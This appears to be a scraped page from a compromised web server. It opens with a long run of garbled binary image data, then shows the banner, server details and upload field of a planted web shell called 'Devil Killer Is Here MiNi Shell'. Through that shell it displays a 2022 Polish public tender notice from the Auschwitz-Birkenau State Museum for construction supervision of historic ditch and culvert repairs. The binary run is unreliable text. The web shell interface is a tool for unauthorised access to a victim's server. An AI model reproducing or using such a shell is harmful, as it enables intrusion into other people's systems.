JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221114/0043742901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Pełnienie usługi nadzoru inwestorskiego przy realizacji Zadania : „Wykonanie remontu zabytkowych rowów i przepustów zlokalizowanych na odcinku BII byłego KL Auschwitz II-Birkenau - Część I” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000276015</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Więźniów Oświęcimia 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oświęcim</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@auschwitz.org</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.auschwitz.org/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Pełnienie usługi nadzoru inwestorskiego przy realizacji Zadania : „Wykonanie remontu zabytkowych rowów i przepustów zlokalizowanych na odcinku BII byłego KL Auschwitz II-Birkenau - Część I” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0e5d11f8-6413-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00437429</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00056226/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.15 Usługa nadzoru inwestorskiego w specjalności: konstrukcyjno-budowlanej, instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci, instalacji i urządzeń .......</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/auschwitz,m,344853,2021.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.2.	Adres poczty elektronicznej: muzeum@auschwitz.org, z tym, że w zakresie niniejszego postępowania właściwym adresem poczty elektronicznej do korespondencji z wykonawcami jest adres wskazany w dział VIII ust 1 SWZ.<br/>	<br/>2.	Adres strony internetowej prowadzonego postępowania, na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem: https://bip.malopolska.pl/auschwitz,m,344853,2021.html <br/>Ponadto postępowanie będzie prowadzone przy użyciu strony internetowej miniPortal: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Z zastrzeżeniem postanowień zawartych w Rozdziale XI SWZ, komunikacja między Zamawiającym, a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej <br/>w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, tj.: pocztą elektroniczną na adres e-mail: przetargi@auschwitz.org <br/>2.	Ofertę, a także oświadczenie, o którym mowa w art. 125 ust. 1 Pzp, składa się pod rygorem nieważności, zgodnie z wyborem Wykonawcy:<br/>2.1.	w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym), lub<br/>2.2.	w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>3.	Komunikacja ustna dopuszczalna jest wyłącznie w odniesieniu do informacji, które nie są istotne, <br/>w szczególności nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia, ofert, o ile jej treść jest udokumentowana (wymagana jest pisemna notatka z ustnej rozmowy).<br/>4.	Zamawiający nie przewiduje komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej w przypadku zaistnienia jednej z sytuacji określonych w art. 65 ust. 1, art. 66 i art. 69 Pzp.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi polegające na „Pełnieniu usługi nadzoru inwestorskiego <br/>w specjalności konstrukcyjno – budowlanej i instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych przy realizacji Zadania prowadzonego pod nazwą: „Wykonanie remontu zabytkowych rowów i przepustów zlokalizowanych na odcinku BII byłego KL Auschwitz II-Birkenau, na terenie Państwowego Muzeum Auschwitz-Birkenau w Oświęcimiu - Część I” w trakcie prowadzenia robót budowlanych objętych pozwoleniem na budowę oraz do upływu terminu gwarancji i rękojmi na roboty budowlane” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71520000-9 - Usługi nadzoru budowlanego</p> <p class="mb-0">71631300-3 - Usługi technicznego nadzoru budowlanego</p> <p class="mb-0">71521000-6 - Usługi nadzorowania placu budowy</p> <p class="mb-0">71530000-2 - Doradcze usługi budowlane</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">16 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenia zamówienia polegającego na podobnych usługach, o którym mowa w art. 214 ust. 1 pkt 7 Ustawy w zakresie dodatkowych wizyt inspektora nadzoru.<br/>Zamówienia podobne Zamawiający, w zależności od potrzeb i środków finansowych, przewiduje udzielić Wykonawcy, który realizuje zamówienie podstawowe, w okresie do 3 lat od dnia jego udzielenia. Zamówienia to polega na powtórzeniu podobnych usług, zgodnie z art. 214 ust. 1 pkt 7 Ustawy PZP, o wartości do 50% umowy, w zakresie realizacji usługi nadzoru, w przypadku konieczności realizacji prac będących przedmiotem niniejszego zamówienia. <br/>Przewidywane zamówienia podobne będą udzielane na zasadach i warunkach określonych w umowie o zamówienie podstawowe, wg następujących zasad: <br/>Wynagrodzenie wykonawcy za realizację zamówienia podobnego zostanie ustalone w nw. sposób: <br/>Dla usługi nadzoru inwestorskiego – ceny zostaną przyjęte na podstawie ceny jednostkowej za wizytę, zgodne z wartościami zamieszczonymi w ofercie Wykonawcy, albo dla zakresów nie występujących <br/>w zamówieniu podstawowym - w oparciu o rynkowe ceny usług.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie inspektora nadzoru w specjalności konstrukcyjno-budowlanej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie inspektora nadzoru w specjalności instalacyjnej, w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, gazowych , wodociągowych i kanalizacyjnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 3.	Wykonawca obowiązany jest do udokumentowania i dysponowania osobami zdolnymi do wykonania Zamówienia t.j :<br/><br/>3.1 Jednym inspektorem nadzoru inwestorskiego w specjalności konstrukcyjno - budowlanej posiadającym łącznie: <br/>a) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno- budowlanej bez ograniczeń,<br/>b) aktualną przynależność do właściwej Okręgowej Izby Inżynierów Budownictwa t.j. wpis na listę członków właściwej izby samorządu zawodowego, <br/>c) co najmniej 24 miesięczne (licząc od momentu uzyskania uprawnień do kierowania robotami) doświadczenie (rozumiane jako suma przepracowanych miesięcy) jako inspektor nadzoru inwestorskiego lub kierownik budowy lub kierownik robót budowlanych przy zabytkach nieruchomych wpisanych do rejestru zabytków, <br/>d) w okresie ostatnich pięciu latach przed dniem składania ofert co najmniej 6 miesięczną (rozumianą jako suma przepracowanych miesięcy) aktywność zawodową polegającą na pełnieniu funkcji technicznych (inspektor nadzoru inwestorskiego lub kierownik budowy lub kierownik robót) przy zabytkach nieruchomych wpisanych do rejestru zabytków. <br/> <br/>3.2 Jednym inspektorem nadzoru inwestorskiego w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych posiadającym łącznie: <br/>a) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,<br/>wodociągowych i kanalizacyjnych bez ograniczeń,<br/>b) aktualną przynależność do właściwej Okręgowej Izby Inżynierów Budownictwa t.j. wpis na listę członków właściwej izby samorządu zawodowego, <br/>c) co najmniej 24 miesięczne (licząc od momentu uzyskania uprawnień do kierowania robotami) doświadczenie (rozumiane jako suma przepracowanych miesięcy) jako inspektor nadzoru inwestorskiego lub kierownik budowy lub kierownik robót budowlanych przy zabytkach nieruchomych wpisanych do rejestru zabytków, <br/>d) w okresie ostatnich pięciu lat przed dniem składania ofert co najmniej 6 miesięczną (rozumianą jako suma przepracowanych miesięcy) aktywność zawodową polegającą na pełnieniu funkcji technicznych (inspektor nadzoru inwestorskiego lub kierownik budowy lub kierownik robót) przy zabytkach nieruchomych wpisanych do rejestru zabytków, <br/>e) kierował lub nadzorował przynajmniej jedną robotą związaną z renowacją rur przepustowych, renowacją kanalizacji techniką rękawów ciasnopasowanych i posiada w tym zakresie co najmniej 3 miesięczne (licząc od momentu uzyskania uprawnień do kierowania robotami) doświadczenie (rozumiane jako suma przepracowanych miesięcy) jako inspektor nadzoru inwestorskiego lub kierownik budowy lub kierownik robót budowlanych.<br/><br/>3.3 Zamawiający dopuszcza łączenie funkcji inspektora nadzoru inwestorskiego w specjalności konstrukcyjno- budowlanej i inspektora nadzoru inwestorskiego w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. Inspektor nadzoru inwestorskiego lub inspektorzy nadzoru inwestorskiego powinni posiadać uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń oraz uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane oraz rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie lub równoważne wydane na podstawie wcześniej obowiązujących przepisów. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne <br/>w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. Zamawiający dopuszcza zgodnie z zapisami art. 20a Ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa uprawnienia do „świadczenia usług transgranicznych”. Zamawiający wskazuje, iż obywatel państwa członkowskiego, posiadający kwalifikacje zawodowe architekta, inżyniera budownictwa lub urbanisty, który prowadzi zgodnie z prawem działalność w zakresie tego zawodu w innym niż Rzeczpospolita Polska państwie członkowskim ma prawo do tymczasowego i okazjonalnego wykonywania zawodu na terytorium Rzeczpospolitej Polskiej, bez konieczności uznawania kwalifikacji zawodowych, z zastrzeżeniem wymogów określonych w ust. 2-11 ww. przepisu. W takiej sytuacji, osoby wskazane w powyższym przepisie, nie są obowiązane do przeprowadzenia procedury uznania kwalifikacji zawodowych w trybie przewidzianym w art. 33a wyżej wskazanej ustawy. W celu potwierdzenia spełnienia uznania wykonywania określonej działalności w charakterze „usługi transgranicznej” dana osoba musi posiadać m.in. tymczasowy wpis na listę członków właściwej izby samorządu zawodowego, zgodnie z art. 20a ust. 6 powołanej ustawy.<br/><br/>3.4 Zmiana osób na osoby posiadające co najmniej równoważne doświadczenie i kwalifikacje wymaga zmiany umowy poprzez sporządzenie aneksu (wyjątek stanowi nieobecność tych osób wynikła z powodu choroby, jeżeli Zamawiającemu zostanie przedstawione odpowiednie zaświadczenie lekarskie, w takim wypadku Wykonawca zobowiązany jest do przedstawienia osoby, która zastąpi nieobecnego inspektora nadzoru, posiadającego co najmniej równoważne doświadczenie i kwalifikacje wymagane w punkcie 3.1 i 3.2.<br/><br/>3.5 Wszystkie osoby, o których mowa w pkt. 3 SWZ muszą posługiwać się językiem polskim.<br/><br/>3.6 Wymieniony w pkt. 3 SWZ skład personelu Wykonawcy należy traktować jako minimalne wymagania Zamawiającego i nie wyczerpuje on całości personelu niezbędnego dla rzetelnego wypełnienia obowiązków Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana niniejszej umowy może nastąpić za zgodą stron, w formie pisemnego aneksu, pod rygorem nieważności.<br/>2.	Zmiana umowy może być dokonana w przypadku:<br/>2.1 Zmiany terminu realizacji Zadania skutkująca zmianą terminu realizacji przedmiotu niniejszej umowy, <br/>2.2 Zmiany osób wskazanych w § 5 ust. 1. W przypadku zmiany osób wskazanych w §5 ust. 1, Wykonawca przedłoży przed rozpoczęciem wykonywania czynności przez te osoby dokumenty, z których będzie jednoznacznie wynikało, że nowe osoby posiadają kwalifikacje i doświadczenie nie grosze niż określone w SWZ dla osób, o których mowa w pkt.3.1 i 3.2. SWZ; Zmiana osób określonych w § 5 ust. 1 niniejszej umowy na osoby posiadające co najmniej równoważne doświadczenie i kwalifikacje wymaga sporządzenia aneksu (wyjątek stanowi nieobecność tych osób wynikła z powodu choroby, jeżeli Zamawiającemu zostanie przedstawione odpowiednie zaświadczenie lekarskie, w takim wypadku Wykonawca zobowiązany jest do przedstawienia osoby, która zastąpi nieobecnego inspektora nadzoru, posiadającej co najmniej równoważne doświadczenie i kwalifikacje wymagane przez Zamawiającego). <br/>2.3 Wystąpienia siły wyższej, przez którą rozumie się wydarzenia powstałe niezależnie od woli Stron umowy, o charakterze zewnętrznym, zaistniałe po dniu zawarcia umowy, a które przy dochowaniu należytej staranności nie były i nie mogły być przewidziane lub też wydarzenia o opisanym charakterze, istniejące w momencie podpisania umowy, których skala nie była możliwa do przewidzenia, ani których następstwom nie można było zapobiec, uniemożliwiające wykonanie obowiązków Stron wynikających z umowy. Przypadkami Siły Wyższej mogą być w szczególności: katastrofy, wojny i wojny domowe, strajk generalny, stany klęski żywiołowej, nieprzewidywalne działania sił natury, embarga, epidemie lub wprowadzone przepisy prawa uniemożliwiające dotrzymanie warunków umowy <br/>3.	Powyższy katalog dopuszczalnych zmian nie stanowi zobowiązania Zamawiającego do dokonania zmiany umowy.<br/>Strony mając na uwadze treść art. 439 ustawy PZP przewidują zmianę wysokości wynagrodzenia Wykonawcy w przypadku zmiany kosztów realizacji przedmiotu umowy przez Wykonawcę po upływie 12 miesięcy obowiązywania umowy, z użyciem wskaźnika ogłoszonego przez Prezesa Głównego Urzędu Statystycznego tj. wskaźnika cen towarów i usług konsumpcyjnych (potocznie: inflacja) albo jeżeli ten wskaźnik nie będzie ogłaszany przez Prezes Głównego Urzędu Statystycznego to za pomocą wskaźnika podobnego, który przy obliczaniu wskaźnika cen towarów i usług konsumpcyjnych stosuje Klasyfikację Spożycia Indywidualnego według Celu, zaadaptowaną na potrzeby Zharmonizowanych Wskaźników Cen Konsumpcyjnych (COICOP/HICP). Zmiana wysokości wynagrodzenia Wykonawcy może być dokonana w oparciu o powyższy wskaźnik lub podobny <br/>(w górę/w dół) po roku obowiązywania umowy, na podstawie wskaźnika opublikowanego za ubiegły rok (na zasadach rok do roku). Wykonawca zgłasza do Zamawiającego wniosek o waloryzację wynagrodzenia umownego na warunkach powyższych, podając wartość wskaźnika ogłoszonego przez Prezesa Głównego Urzędu Statystycznego, zakres i wartość zmiany 